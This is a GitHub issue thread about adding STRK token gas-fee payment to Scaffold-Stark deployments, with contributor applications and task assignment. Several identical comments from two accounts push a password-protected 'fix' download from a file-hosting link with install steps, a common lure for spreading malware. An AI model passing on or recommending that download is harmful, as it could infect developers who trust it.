### ISSUE TITLE
Support contract deployment with STRK token

### ISSUE THREAD

**Issue by gianalarcon** [Scaffold-Stark/scaffold-stark-2#263]
## Issue Overview

During the deployment process, gas fees are currently paid using the `ETH` token. However, the framework should be enhanced to support payments with the `STRK` token as well.

## Proposed Solutions

1. **Default to ETH with STRK as a Fallback:** 
   - Retain the default behavior of paying gas fees with `ETH`. If there isn't enough `ETH` available, automatically check for `STRK` and use it to continue with the payment process.

2. **Direct Payment with STRK:**
   - Add support for paying gas fees directly with `STRK` by introducing the following commands:
     - `yarn deploy --fee strk`
     - `yarn deploy --network sepolia --fee strk`

These enhancements will provide more flexibility in gas fee payments during the deployment process.

### Instructions for Contributing

- Leave a comment on this Issue.
- Wait for our confirmation to start on the project.
- Once you have received confirmation, begin working on your contribution.

### Incentives

Contributions are rewarded via Only Dust.

### Contact

For questions, join to our [tg group](https://t.me/+wO3PtlRAreo4MDI9) and reach out our team

**Comment by Jemiiah** [comment]
I would love to work on this issue @gianalarcon

**Comment by josephchimebuka** [comment]
I would love to work on this ser!

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ugo-X** [comment]
Good morning @gianalarcon 
I am a Full Stack blockchain Developer with expertise in Next.js, Nest.js, TypeScript, JavaScript, React, Node.js, Three.js, and Solidity. My journey with OnlyDust hackathons began at Edition 1, and I've since made 52 contributions across 12 projects. With my extensive experience on the OnlyDust platform (profile:  https://app.onlydust.com/u/Ugo-X), I've honed my skills in delivering quality solutions under pressure.
I bring a unique blend of technical proficiency and user-focused design to every project, whether it's crafting immersive 3D experiences or developing smart contracts. My track record shows I can adapt quickly and contribute effectively to diverse challenges.



I will approach this task in the following stages:

1. I will start by analyzing the current deployment script:
   - I will examine how it currently handles gas fees with ETH
   - I will identify the specific parts of the code that need modification

2. I will set up the development environment:
   - I will ensure I have Node.js and yarn installed
   - I will clone the project repository
   - I will install all necessary dependencies

3. I will implement the command-line option:
   - I will modify the CLI parser to accept the new --fee flag
   - I will add logic to interpret 'strk' as the fee token when specified

4. I will create a new module for fee handling:
   - I will write a function to check ETH balance
   - I will write a function to check STRK balance
   - I will implement logic to determine which token to use based on balances and user preference

5. I will modify the deployment function:
   - I will integrate the new fee handling module
   - I will add conditional logic to use either ETH or STRK for gas fees

6. I will implement the fallback mechanism:
   - I will add logic to attempt STRK payment if ETH payment fails
   - I will ensure proper error handling and user feedback

7. I will update the Web3 integration:
   - I will modify the Web3 provider configuration to support STRK transactions
   - I will implement functions to estimate gas costs in both ETH and STRK

8. I will add STRK approval functionality:
   - I will implement a function to approve the deployment contract to spend STRK
   - I will ensure this happens before attempting to pay fees with STRK

9. I will implement error handling and logging:
   - I will add try-catch blocks around critical operations
   - I will implement informative error messages for various failure scenarios
   - I will add logging to track the fee payment process

10. I will write unit tests:
    - I will create tests for the new fee handling module
    - I will write tests for both ETH and STRK payment scenarios
    - I will ensure edge cases are covered (e.g., insufficient balance)

11. I will update the documentation:
    - I will add information about the new --fee option to the README
    - I will provide examples of how to use the new feature

12. I will perform integration testing:
    - I will test the entire deployment process on a testnet (e.g., Sepolia)
    - I will verify that both ETH and STRK payments work as expected

13. I will conduct a code review:
    - I will review my changes for code quality and potential issues
    - I will ensure the code follows project conventions and best practices

14. I will create a pull request:
    - I will commit my changes to a new branch
    - I will push the branch to the repository
    - I will create a detailed pull request describing the changes and implementation

15. I will address feedback:
    - I will be responsive to any comments or requested changes from reviewers
    - I will make necessary adjustments based on the feedback

16. I will assist with deployment:
    - Once approved, I will help merge the changes into the main branch
    - I will assist with any necessary updates to deployment processes or documentation

This approach covers the key steps needed to implement the new feature while maintaining code quality and following good development practices.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by PoulavBhowmick03** [comment]
I'm Poulav Bhowmick, a software engineer at Invisible Studios with a robust background in TypeScript, Rust, Solidity Cairo, fullstack development and blockchain technology. My experience includes building robust applications, optimizing functionalities and blockchain integration. I have actively participated in events and open source contributions, enhancing my capability to tackle real-world tech challenges. My projects can be viewed on my GitHub Profile and OnlyDust Profile. Plus I´m active member of Starknet community🇷.

Here's how I will solve this
Implement Default ETH with STRK Fallback:
Modify the existing deployment script to first attempt payment with ETH.
If ETH balance is insufficient, add logic to check STRK balance and use it for payment.
Implement a helper function to handle the token switching logic.


Add Direct STRK Payment Option:
Extend the deployment script to accept a new --fee flag.
Implement logic to process the --fee strk option, prioritizing STRK for gas payment when specified.
Update the yarn deploy command to support the new flag for both mainnet and Sepolia network.


Enhance Error Handling and User Feedback:
Add clear error messages for insufficient balances in both ETH and STRK.
Implement logging to inform users about which token is being used for gas fees.


Testing:
Write unit tests for the new token switching logic and STRK payment option.
Perform integration tests on Sepolia testnet to ensure smooth deployment with both ETH and STRK.


Documentation:
Update the README and deployment documentation to explain the new STRK payment option.
Add examples of using the --fee strk flag in the documentation.

I estimate this will take about 3-4 days to implement and test thoroughly. Let me know if this approach sounds good or if you'd like me to adjust anything. I'm ready to start working on this once I receive confirmation.

**Comment by ShantelPeters** [comment]
hey @gianalarcon please let me work on this one and be a contributor to your repo :)

**Comment by martinvibes** [comment]
hey @gianalarcon please let me work on this one and be a contributor to your repo :)

**Comment by ShantelPeters** [comment]
Hi @gianalarcon there is no place to apply on the onlydust platform

**Comment by gianalarcon** [comment]
All yours @PoulavBhowmick03 
You have until September 3rd to send a PR ( you can send a draft PR anytime from now)

**Comment by PoulavBhowmick03** [comment]
> All yours @PoulavBhowmick03 
> You have until September 3rd to send a PR ( you can send a draft PR anytime from now)

Thanks! Onto it

**Comment by Jemiiah** [comment]
Yes i would love to work on this @PoulavBhowmick03

**Comment by Jemiiah** [comment]
I work on part 1 of this issue aswell @jrcarlos2000

**Comment by Nadai2010** [comment]
Hello @Jemiiah , since you have already made the issue part 2 in deadline, we will assign you part 1.

@metalboyrick
